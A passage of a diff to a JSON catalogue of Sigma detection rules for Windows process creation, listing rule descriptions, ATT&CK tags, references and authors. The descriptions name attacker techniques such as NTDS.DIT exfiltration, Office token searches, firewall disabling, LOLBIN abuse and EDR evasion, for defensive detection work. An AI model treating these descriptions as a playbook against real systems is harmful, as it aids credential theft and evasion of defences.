"falsepositive": [ - "File located in the AppData folder with trusted signature" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", - "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", - "value": "Missing Space Characters in Command Lines", 
- "meta": { - "refs": [ - "https://twitter.com/cyb3rops/status/1562072617552678912", - "https://ss64.com/nt/cmd.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/08/23", - "filename": "proc_creation_win_susp_missing_spaces.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", - "uuid": "1dd05363-104e-4b4a-b963-196a534b03a1", - "value": "Suspicious Mofcomp Execution", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml", - "https://docs.microsoft.com/en-us/windows/win32/wmisdk/mofcomp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mofcomp_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2022/07/12", - "filename": "proc_creation_win_susp_mofcomp_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "uuid": "cb7c4a03-2871-43c0-9bbb-18bbdb079896", - "value": "Mounted Share Deleted", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mounted_share_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.005" - ], - "creation_date": "2020/10/08", - "filename": "proc_creation_win_susp_mounted_share_deletion.yml", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "level": "low", - "falsepositive": [ - "Administrators or Power users may remove their shares via cmd line" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", - "value": "MpiExec Lolbin", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1465058133303246867", - "https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mpiexec_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_susp_mpiexec_lolbin.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process", - "uuid": "33be4333-2c6b-44f4-ae28-102cdbde0a31", - "value": "Suspicious Msbuild 
Execution By Uncommon Parent Process", - "meta": { - "refs": [ - "https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/", - "https://www.echotrail.io/insights/search/msbuild.exe", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msbuild.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/11/17", - "filename": "proc_creation_win_susp_msbuild.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "uuid": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "value": "MSHTA Suspicious Execution 01", - "meta": { - "refs": [ - "http://blog.sevagas.com/?Hacking-around-HTA-files", - "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", - "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", - "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", - "https://twitter.com/mattifestation/status/1326228491302563846", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" - ], - "creation_date": "2019/02/22", - "filename": "proc_creation_win_susp_mshta_execution.yml", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", - "level": "high", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious mshta 
process patterns", - "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "value": "Suspicious MSHTA Process Patterns", - "meta": { - "refs": [ - "https://en.wikipedia.org/wiki/HTML_Application", - "https://www.echotrail.io/insights/search/mshta.exe", - "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ], - "creation_date": "2021/07/17", - "filename": "proc_creation_win_susp_mshta_pattern.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "uuid": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "value": "Mshtml DLL RunHTMLApplication Abuse", - "meta": { - "refs": [ - "https://twitter.com/n1nj4sec/status/1421190238081277959", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshtml_runhtmlapplication.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/14", - "filename": "proc_creation_win_susp_mshtml_runhtmlapplication.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of msiexec from an uncommon directory", - "uuid": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", - "value": "Suspicious MsiExec Directory", - "meta": { - "refs": [ - "https://twitter.com/200_okay_/status/1194765831911215104", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_cwd.yml" - ], - 
"tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2019/11/14", - "filename": "proc_creation_win_susp_msiexec_cwd.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious msiexec process starts with web addresses as parameter", - "uuid": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", - "value": "MsiExec Web Install", - "meta": { - "refs": [ - "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msiexec_web_install.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007", - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2018/02/09", - "filename": "proc_creation_win_susp_msiexec_web_install.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Downloads payload from remote server", - "uuid": "0c79148b-118e-472b-bdb7-9b57b444cc19", - "value": "Malicious Payload Download via Office Binaries", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", - "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", - "Reegun J (OCBC Bank)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2019/10/26", - "filename": "proc_creation_win_susp_msoffice.yml", - "author": "Beyu Denis, oscd.community", - 
"level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "uuid": "0e4164da-94bc-450d-a7be-a4b176179f1f", - "value": "Suspicious Netsh Discovery Command", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_discovery_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ], - "creation_date": "2021/12/07", - "filename": "proc_creation_win_susp_netsh_discovery_command.yml", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "low", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects persitence via netsh helper", - "uuid": "56321594-9087-49d9-bf10-524fe8479452", - "value": "Suspicious Netsh DLL Persistence", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", - "https://attack.mitre.org/software/S0108/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.007", - "attack.s0108" - ], - "creation_date": "2019/10/25", - "filename": "proc_creation_win_susp_netsh_dll_persistence.yml", - "author": "Victor Sergeev, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - 
} - }, - { - "description": "Detects netsh commands that turns off the Windows firewall", - "uuid": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "value": "Firewall Disabled via Netsh", - "meta": { - "refs": [ - "https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/", - "https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsh_firewall_disable.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" - ], - "creation_date": "2019/11/01", - "filename": "proc_creation_win_susp_netsh_firewall_disable.yml", - "author": "Fatih Sirin", - "level": "medium", - "falsepositive": [ - "Legitimate administration" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of client32.exe (NetSupport RAT) from an unsual location (outisde of 'C:\\Program Files')", - "uuid": "37e8d358-6408-4853-82f4-98333fca7014", - "value": "Execution of NetSupport RAT From Unusual Location", - "meta": { - "refs": [ - "https://redcanary.com/blog/misbehaving-rats/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_netsupport_rat_exec_location.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/19", - "filename": "proc_creation_win_susp_netsupport_rat_exec_location.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through 
information discovery of remote systems", - "uuid": "a29c1813-ab1f-4dde-b489-330b952e91ae", - "value": "Suspicious Network Command", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1016" - ], - "creation_date": "2021/12/07", - "filename": "proc_creation_win_susp_network_command.yml", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "low", - "falsepositive": [ - "Administrator, hotline ask to user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "uuid": "1c67a717-32ba-409b-a45d-0fb704a73a81", - "value": "Suspicious Listing of Network Connections", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_listing_connections.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049" - ], - "creation_date": "2021/12/10", - "filename": "proc_creation_win_susp_network_listing_connections.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of Net.exe, whether suspicious or benign.", - "uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", - 
"value": "Net.exe Execution",
- "meta": {
- "refs": [
- "https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/",
- "https://eqllib.readthedocs.io/en/latest/analytics/4d2e7fc1-af0b-4915-89aa-03d25ba7805e.html",
- "https://eqllib.readthedocs.io/en/latest/analytics/e61f557c-a9d0-4c25-ab5b-bbc46bb24deb.html",
- "https://eqllib.readthedocs.io/en/latest/analytics/9b3dd402-891c-4c4d-a662-28947168ce61.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1007/T1007.md#atomic-test-2---system-service-discovery---netexe",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_execution.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1007",
- "attack.t1049",
- "attack.t1018",
- "attack.t1135",
- "attack.t1201",
- "attack.t1069.001",
- "attack.t1069.002",
- "attack.t1087.001",
- "attack.t1087.002",
- "attack.lateral_movement",
- "attack.t1021.002",
- "attack.s0039"
- ],
- "creation_date": "2019/01/16",
- "filename": "proc_creation_win_susp_net_execution.yml",
- "author": "Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements)",
- "level": "low",
- "falsepositive": [
- "Will need to be tuned. If using Splunk, I recommend | stats count by Computer,CommandLine following the search for easy hunting by computer/CommandLine."
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files",
- "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993",
- "value": "Suspicious Net Use Command Combo",
- "meta": {
- "refs": [
- "https://twitter.com/ShadowChasing1/status/1552595370961944576",
- "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.001"
- ],
- "creation_date": "2022/09/01",
- "filename": "proc_creation_win_susp_net_use.yml",
- "author": "pH-T",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a when net.exe is called with a password in the command line",
- "uuid": "d4498716-1d52-438f-8084-4a603157d131",
- "value": "Password Provided In Command Line Of Net.exe",
- "meta": {
- "refs": [
- "Internal Research",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use_password_plaintext.yml"
- ],
- "tags": "No established tags",
- "creation_date": "2021/12/09",
- "filename": "proc_creation_win_susp_net_use_password_plaintext.yml",
- "author": "Tim Shelton (HAWK.IO)",
- "level": "medium",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"",
- "uuid": "431a1fdb-4799-4f3b-91c3-a683b003fc49",
- "value": "New Kernel Driver Via SC.EXE",
- "meta": {
- "refs": [
- "https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_kernel_driver_via_sc.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1543.003"
- ],
- "creation_date": "2022/07/14",
- "filename": "proc_creation_win_susp_new_kernel_driver_via_sc.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Rare legitimate installation of kernel drivers via sc.exe"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths",
- "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8",
- "value": "Suspicious New Service Creation",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md",
- "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.privilege_escalation",
- "attack.t1543.003"
- ],
- "creation_date": "2022/07/14",
- "filename": "proc_creation_win_susp_new_service_creation.yml",
- "author": "Nasreddine Bencherchali",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n",
- "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31",
- "value": "Ngrok Usage",
- "meta": {
- "refs": [
- "https://ngrok.com/docs",
- "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html",
- "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp",
- "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection",
- "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/",
- "https://twitter.com/xorJosh/status/1598646907802451969",
- "https://www.softwaretestinghelp.com/how-to-use-ngrok/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ngrok_pua.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1572"
- ],
- "creation_date": "2021/05/14",
- "filename": "proc_creation_win_susp_ngrok_pua.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Another tool that uses the command line switches of Ngrok",
- "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation",
- "uuid": "f6ecd1cf-19b8-4488-97f6-00f0924991a3",
- "value": "Suspicious Nmap Execution",
- "meta": {
- "refs": [
- "https://nmap.org/",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nmap.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1046"
- ],
- "creation_date": "2021/12/10",
- "filename": "proc_creation_win_susp_nmap.yml",
- "author": "frack113",
- "level": "high",
- "falsepositive": [
- "Network administrator computer"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)",
- "uuid": "c09dad97-1c78-4f71-b127-7edb2b8e491a",
- "value": "Execution of Suspicious File Type Extension",
- "meta": {
- "refs": [
- "https://pentestlaboratories.com/2021/12/08/process-ghosting/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_non_exe_image.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ],
- "creation_date": "2021/12/09",
- "filename": "proc_creation_win_susp_non_exe_image.yml",
- "author": "Max Altgelt",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection",
- "uuid": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2",
- "value": "Suspicious Ntdll Pipe Redirection",
- "meta": {
- "refs": [
- "https://www.x86matthew.com/view_post?id=ntdll_pipe",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdll_type_redirect.yml"
- ],
- "tags": [
- "attack.defense_evasion"
- ],
- "creation_date": "2022/03/05",
- "filename": "proc_creation_win_susp_ntdll_type_redirect.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration",
- "uuid": "8bc64091-6875-4881-aaf9-7bd25b5dda08",
- "value": "Suspicious Process Patterns NTDS.DIT Exfil",
- "meta": {
- "refs": [
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration",
- "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/",
- "https://pentestlab.blog/tag/ntds-dit/",
- "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1",
- "https://github.com/zcgonvh/NTDSDumpEx",
- "https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1",
- "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntds.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.003"
- ],
- "creation_date": "2022/03/11",
- "filename": "proc_creation_win_susp_ntds.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc.",
- "uuid": "a58353df-af43-4753-bad0-cd83ef35eef5",
- "value": "Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe)",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.003"
- ],
- "creation_date": "2022/09/14",
- "filename": "proc_creation_win_susp_ntdsutil_usage.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate usage to restore snapshots",
- "Legitimate admin activity"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service",
- "uuid": "bb76d96b-821c-47cf-944b-7ce377864492",
- "value": "Suspicious NTLM Authentication on the Printer Spooler Service",
- "meta": {
- "refs": [
- "https://twitter.com/med0x2e/status/1520402518685200384",
- "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntlmrelay.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.credential_access",
- "attack.t1212"
- ],
- "creation_date": "2022/05/04",
- "filename": "proc_creation_win_susp_ntlmrelay.yml",
- "author": "Elastic (idea), Tobias Michalski",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n",
- "uuid": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e",
- "value": "Suspicious NT Resource Kit Auditpol Usage",
- "meta": {
- "refs": [
- "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Windows%202000%20Resource%20Kit%20Tools/AuditPol",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.002"
- ],
- "creation_date": "2021/12/18",
- "filename": "proc_creation_win_susp_nt_resource_kit_auditpol_usage.yml",
- "author": "Nasreddine Bencherchali @nas_bench",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL",
- "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e",
- "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe",
- "meta": {
- "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/",
- "https://twitter.com/Hexacorn/status/1187143326673330176",
- "https://redcanary.com/blog/raspberry-robin/",
- "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218.008"
- ],
- "creation_date": "2019/10/25",
- "filename": "proc_creation_win_susp_odbcconf.yml",
- "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Legitimate use of odbcconf.exe by legitimate user"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.",
- "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615",
- "value": "Suspicious Office Token Search Via CLI",
- "meta": {
- "refs": [
- "https://mrd0x.com/stealing-tokens-from-office-applications/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1528"
- ],
- "creation_date": "2022/10/25",
- "filename": "proc_creation_win_susp_office_token_search.yml",
- "author": "Nasreddine Bencherchali",
- "level": "medium",
- "falsepositive": [
- "Legitimate command-lines containing the string mentioned in the command-line"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "The OpenWith.exe executes other binary",
- "uuid": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f",
- "value": "OpenWith.exe Executes Specified Binary",
- "meta": {
- "refs": [
- "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml",
- "https://twitter.com/harr0ey/status/991670870384021504",
